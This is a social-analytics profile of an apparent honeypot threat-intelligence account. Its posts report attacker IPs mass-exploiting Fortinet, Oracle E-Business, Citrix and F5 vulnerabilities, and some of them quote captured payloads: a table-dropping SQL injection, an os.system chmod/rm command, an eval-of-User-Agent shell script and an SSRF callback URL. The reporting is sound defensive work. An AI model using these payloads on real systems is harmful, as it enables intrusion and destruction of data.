[GUEST ACCESS MODE: Data is scrambled or limited to provide examples. Make requests using your API key to unlock full data. Check https://lunarcrush.ai/auth for authentication information.]

# @DefusedCyber Defused

Defused posts on X about oracle, over the, sweden, eval the most. They currently have XXXXX followers and XX posts still getting attention that total XXXXX engagements in the last XX hours.

### Engagements: XXXXX

- X Week XXXXXXX +62%
- X Month XXXXXXX +381%
- X Year XXXXXXX +43,732%

### Mentions: XX

- X Week XX -XX%
- X Month XX +114%
- X Year XXX +2,450%

### Followers: XXXXX

- X Week XXXXX +10%
- X Month XXXXX +134%

### CreatorRank: XXXXXXX

### Social Influence

**Social category influence** technology brands XXXXX%, stocks XXXX%, countries XXXX%

**Social topic influence** oracle #123, over the 2.27%, sweden 2.27%, eval 2.27%, ransomware 2.27%, ips 2.27%, infrastructure 2.27%, has been XXXX%

**Top accounts mentioned or mentioned by** @henkpoley @mrglaive @bethelegwu @simokohonen @elegantgent12

### Top Social Posts

Top posts by engagements in the last XX hours

"Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 64.95.13.8 ( BLNWX ) VirusTotal Detections: 0/95. JWT payload translates into: "username": "admin" "profname": "prof_admin" "vdom": "root" "loginname": "admin""
[X Link](https://x.com/DefusedCyber/status/1975242250373517373) @DefusedCyber 2025-10-06T16:50Z 3006 followers, 26.4K engagements

"A Few Exploits Captured Over the Weekend: 95.143.193.150 ( Internetport Sweden AB ) Exploiting CVE-2025-25257 (FortiWeb SQLi) 146.56.116.119 ( ORACLE-BMC-31898 ) Exploiting CVE-2025-5777 (CitrixBleed 2) 146.70.166.212 ( M247 Europe SRL ) Exploiting CVE-2025-61882 (Oracle E-Business RCE) All 0/95 on VirusTotal"
[X Link](https://x.com/DefusedCyber/status/1977415061598564830) @DefusedCyber 2025-10-12T16:44Z 3006 followers, 11.5K engagements

"Exploitation of Oracle E-Business RCE CVE-2025-61882 continues to be active: 139.180.218.167 ( AS-VULTR ) 37.221.127.41 ( Pq Hosting Plus S.r.l. ) 5.180.24.171 ( WorkTitans B.V. ) All 0/95 on VirusTotal"
[X Link](https://x.com/DefusedCyber/status/1977735733893796007) @DefusedCyber 2025-10-13T13:58Z 3006 followers, 2374 engagements

"Actor mass exploiting CVE-2025-25257 (Critical FortiWeb SQLi) from 213.138.72.10 ( Limited Liability Company TTK-Svyaz ) VirusTotal Detections: 0/95. The actor exploited multiple honeypots across a short timeframe (1 hour)"
[X Link](https://x.com/DefusedCyber/status/1978132533733667309) @DefusedCyber 2025-10-14T16:15Z 3006 followers, 7910 engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 23.234.102.176 ( TZULO ) VirusTotal Detections 0/95. The actor exploited multiple Oracle E-Business honeypots within a short timeframe"
[X Link](https://x.com/DefusedCyber/status/1978361081803178471) @DefusedCyber 2025-10-15T07:23Z 3006 followers, 1847 engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 146.70.44.192 ( M247 Europe SRL ) VirusTotal Detections 0/95. Actor hit multiple Oracle E-Business honeypots in a short timeframe"
[X Link](https://x.com/DefusedCyber/status/1978801348352131257) @DefusedCyber 2025-10-16T12:33Z 3006 followers, 1582 engagements

"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 216.245.184.99 ( BLNWX ) VirusTotal Detections: 0/95. Payload: `Authorization: Bearer ';DROP/**/TABLE/**/fabric_user.a;--`"
[X Link](https://x.com/DefusedCyber/status/1979161102349934734) @DefusedCyber 2025-10-17T12:22Z 3006 followers, 69.1K engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.140.45.8 ( Hostcenter ) VirusTotal Detections 0/95. Actor exploited CVE-2025-61882 on four different Oracle honeypots within a 15-minute timeframe"
[X Link](https://x.com/DefusedCyber/status/1979968035097018421) @DefusedCyber 2025-10-19T17:49Z 3006 followers, 4286 engagements

"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 149.88.26.225 ( Datacamp Limited ) VirusTotal Detections: 0/95. Payload: `. import os os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py')`"
[X Link](https://x.com/DefusedCyber/status/1980214208076939440) @DefusedCyber 2025-10-20T10:07Z 3006 followers, 2270 engagements

"Actor exploiting CVE-2023-46747 (F5 BIG-IP Auth Bypass Vuln ) from 104.140.226.176 ( AS62904 ) VirusTotal Detections 0/95. Actor attempts to create a new admin user with full permissions"
[X Link](https://x.com/DefusedCyber/status/1980634240938283057) @DefusedCyber 2025-10-21T13:56Z 3006 followers, 2343 engagements

"Actor exploiting CVE-2023-46747 (F5 BIG-IP Auth Bypass Vuln ) from 195.248.71.38 ( LLC Melt-internet ) VirusTotal Detections 0/95. Actor attempts to create a new admin user with full permissions"
[X Link](https://x.com/DefusedCyber/status/1980578501838401765) @DefusedCyber 2025-10-21T10:14Z 3006 followers, 9324 engagements

"New Critical Vulnerabilities in Oracle E-Business. Two new critical vulnerabilities disclosed by Oracle - CVE-2025-53072 & CVE-2025-62481. No POC available yet - this is the perfect time to deploy some Oracle E-Business honeypots"
[X Link](https://x.com/DefusedCyber/status/1980937798212284692) @DefusedCyber 2025-10-22T10:02Z 3006 followers, 1863 engagements

"Actor exploiting CVE-2025-25257 (Critical FortiWeb SQL Injection Vulnerability) from 139.162.82.104 ( Akamai Connected Cloud ) VirusTotal Detections: 0/95. Decoded Payload: `#/bin/sh printf "Content-Type: text/htmlrn"; printf "rn"; eval $ HTTP_USER_AGENT import os # os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py') #`"
[X Link](https://x.com/DefusedCyber/status/1976339547328766053) @DefusedCyber 2025-10-09T17:30Z 2951 followers, 11.3K engagements

"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +184037.21% - CVE-2021-26857 (Exchange On-Pre.) +384.58% - CVE-2021-27878 (Veritas Veritas.) +202.15% - CVE-2021-27877 (Veritas Veritas.) +183.71% - CVE-2021-27102 (Accellion File .) +38.22%"
[X Link](https://x.com/DefusedCyber/status/1977709712561799257) @DefusedCyber 2025-10-13T12:15Z 2978 followers, 14.6K engagements

"Check the full ransomware vulnerabilities list"
[X Link](https://x.com/DefusedCyber/status/1977710216394207721) @DefusedCyber 2025-10-13T12:17Z 2999 followers, XXX engagements

"For a limited time deploy a FortiWeb decoy / honeypot for FREE"
[X Link](https://x.com/DefusedCyber/status/1978132689824735240) @DefusedCyber 2025-10-14T16:15Z 2971 followers, XXX engagements

"We want to add some more threat intel honeypots. What types of honeypots should we deploy? Help us choose"
[X Link](https://x.com/DefusedCyber/status/1979937368573403137) @DefusedCyber 2025-10-19T15:47Z 2984 followers, 2178 engagements

"Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 169.150.198.85 ( Datacamp Limited ) VirusTotal Detections: X / XX. Exploit attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad administrative permissions"
[X Link](https://x.com/DefusedCyber/status/1976546196681535848) @DefusedCyber 2025-10-10T07:11Z 3001 followers, 9999 engagements

"Actor exploiting CVE-2025-52970 (FortiWeb Authentication Bypass) from 182.8.97.131 ( PT. Telekomunikasi Selular) VirusTotal Detections: 0/95. This vulnerability has not yet entered known exploitation by CISA but exploits have hit honeypots since late August"
[X Link](https://x.com/DefusedCyber/status/1978438709335703596) @DefusedCyber 2025-10-15T12:32Z 3002 followers, 2455 engagements

"Breach Alert: A nation-state actor has exfiltrated BIG-IP source code and other sensitive data from F5. F5 has released multiple patches but the impact remains unclear. We have added the F5 Big-IP honeypot for Defused Free users for a limited time - take advantage"
[X Link](https://x.com/DefusedCyber/status/1978494230155743441) @DefusedCyber 2025-10-15T16:12Z 3002 followers, 18.1K engagements

"Elevated probing of CVE-2025-32756 (buffer overflow in multiple Fortinet products). Attackers looking to exploit this vulnerability use the /module/admin.fe path to enumerate targets. Associated IPs from the past X days: 31.170.22.86 178.17.172.98 143.244.63.95 143.244.33.80"
[X Link](https://x.com/DefusedCyber/status/1973434297685283100) @DefusedCyber 2025-10-01T17:06Z 3005 followers, 5641 engagements

"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 158.179.174.140 ( ORACLE-BMC-31898 ) VirusTotal Detections: 0/95. This actor has exploited multiple honeypots within the past X days"
[X Link](https://x.com/DefusedCyber/status/1978864766518018133) @DefusedCyber 2025-10-16T16:45Z 3006 followers, 1156 engagements

"Multiple actors mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) 194.127.167.106 ( Owl Limited ) 83.143.242.45 ( M247 Europe SRL ) Both actors exploited multiple Oracle honeypots simultaneously during a short time duration (within XX minutes)"
[X Link](https://x.com/DefusedCyber/status/1979263668186681358) @DefusedCyber 2025-10-17T19:10Z 3006 followers, 3297 engagements

"Defused users are seeing targeted exploits for F5 BIG-IP honeypots. The recent F5 breach may cause more active exploitation against F5 infrastructure - more fresh intel. For a limited time deploy a F5 BIG-IP decoy / honeypot for FREE"
[X Link](https://x.com/DefusedCyber/status/1979614594600681834) @DefusedCyber 2025-10-18T18:24Z 3006 followers, 4464 engagements

"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 206.237.15.245 ( MOACK .Co. LTD ) VirusTotal Detections: 0/95. This actor exploited multiple Netscaler honeypots using CVE-2025-5777 within a span of XX minutes"
[X Link](https://x.com/DefusedCyber/status/1979899080928329760) @DefusedCyber 2025-10-19T13:15Z 3006 followers, 1383 engagements

"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +191397.67% - CVE-2021-27878 (Veritas Veritas.) +167.85% - CVE-2021-27877 (Veritas Veritas.) +151.55% - CVE-2021-27102 (Accellion File .) +38.22% - CVE-2021-26857 (Exchange On-Pre.) +26.06%"
[X Link](https://x.com/DefusedCyber/status/1980223102458962247) @DefusedCyber 2025-10-20T10:42Z 3006 followers, 2518 engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 37.72.168.234 (HVC-AS) VirusTotal Detections 0/95. This actor exploited several Oracle honeypots within a short timeframe"
[X Link](https://x.com/DefusedCyber/status/1980695928022417662) @DefusedCyber 2025-10-21T18:01Z 3006 followers, XXX engagements

"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.106.231.194 ( BrainStorm Network Inc ) VirusTotal Detections 0/95. This actor has been heavily exploiting Oracle E-Business honeypots for multiple days"
[X Link](https://x.com/DefusedCyber/status/1980952429752426690) @DefusedCyber 2025-10-22T11:00Z 3006 followers, XXX engagements

"Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 81.0.246.16 ( Contabo GmbH ) VirusTotal Detections: 0/95. Payload: Attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad admin rights"
[X Link](https://x.com/DefusedCyber/status/1980278833254187242) @DefusedCyber 2025-10-20T14:24Z 3006 followers, 3194 engagements

"Actor exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 116.96.46.202 (Viettel Group) VirusTotal Detections 0/95. SSRF url: param name="return_url"d3sf0irfhr5o320gc8s0di1mkfokc8i7a.oast.me/param"
[X Link](https://x.com/DefusedCyber/status/1981040364053033095) @DefusedCyber 2025-10-22T16:50Z 3006 followers, 4507 engagements